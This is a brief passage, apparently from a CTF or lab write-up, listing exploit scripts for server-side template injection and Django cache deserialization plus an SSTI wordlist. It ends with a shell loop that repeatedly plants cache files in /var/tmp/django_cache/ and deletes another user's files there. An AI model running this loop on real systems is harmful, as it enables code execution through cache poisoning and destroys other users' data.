exploit.pyis a script to test what payload that exactly triggers while there's no error handling discloses.ssti.txtis a simple SSTI wordlist in the wild.exploit2.pyfor deserialization attack on Django.
while true; do cp -r *djcache /var/tmp/django_cache/; find /var/tmp/django_cache/ -type f -user sandy | while IFS= read -r line; do rm -rf $line; done; done